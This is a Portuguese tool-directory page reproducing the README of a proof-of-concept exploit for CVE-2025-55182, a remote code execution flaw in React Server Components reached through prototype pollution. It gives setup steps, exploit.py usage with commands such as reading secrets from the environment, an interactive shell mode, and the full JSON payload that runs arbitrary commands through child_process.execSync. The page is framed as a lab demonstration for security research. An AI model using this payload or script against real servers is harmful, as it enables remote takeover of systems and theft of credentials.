Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
EXPLOIT-CVE-2025-55182 — Exploit de prova de conceito para CVE-2025-55182 (React2Shell), uma vulnerabilidade crítica de RCE nos React Server Components via poluição de protótipo. Inclui modos de exploração interativo e de linha de comando. | Kitploit
Ferramentas/GitHubGitHub/joaovicdev/exploit-cve-2025-55182
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed TeamingDesenvolvimento de Payloads
GitHubjoaovicdev/exploit-cve-2025-55182

EXPLOIT-CVE-2025-55182

Exploit de prova de conceito para CVE-2025-55182 (React2Shell), uma vulnerabilidade crítica de RCE nos React Server Components via poluição de protótipo. Inclui modos de exploração interativo e de linha de comando.

Ver Repositório
há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 Prova de Conceito

CVE-2025-55182 React

Visão Geral

Uma demonstração prática do CVE-2025-55182 (React2Shell) - uma vulnerabilidade crítica de RCE em Componentes de Servidor React.


Detalhes da Vulnerabilidade

  • ID do CVE: CVE-2025-55182
  • Tipo: Execução Remota de Código via Poluição de Protótipo
  • CVSS: 9.8 (CRÍTICO)
  • Afetados: React 19.0.0, 19.1.0, 19.1.1, 19.2.0

Vetor de Ataque

Os Componentes de Servidor React desserializam FormData de forma insegura. Campos multipart especialmente criados provocam poluição de protótipo e executam código arbitrário via child_process.execSync.


Configuração Rápida

root@kitploit:~
npm install
pip3 install requests
npm run dev

A aplicação roda em: http://localhost:3000


Exploração

Uso Básico

root@kitploit:~
python3 exploit.py -c "whoami"

Exemplos de Comando

root@kitploit:~
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"

Modo Interativo

root@kitploit:~
python3 exploit.py -i
root@kitploit:~
> whoami
COMMAND RESULT:
your-username
============================================================

> pwd
COMMAND RESULT:
/path/to/project
============================================================

> exit

Como Funciona

Estrutura do Payload

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

Testes

Terminal 1: Iniciar servidor

root@kitploit:~
npm run dev

Terminal 2: Executar exploit

root@kitploit:~
python3 exploit.py -c "whoami"

Modo Verboso

root@kitploit:~
python3 exploit.py -c "whoami" -v

Mostra a estrutura completa do payload e a resposta do servidor


Referências

  • CVE-2025-55182 - NVD
  • React Security
  • OWASP Deserialization

Por Guaxinim | Pesquisa em Segurança Cibernética

Baixar ferramenta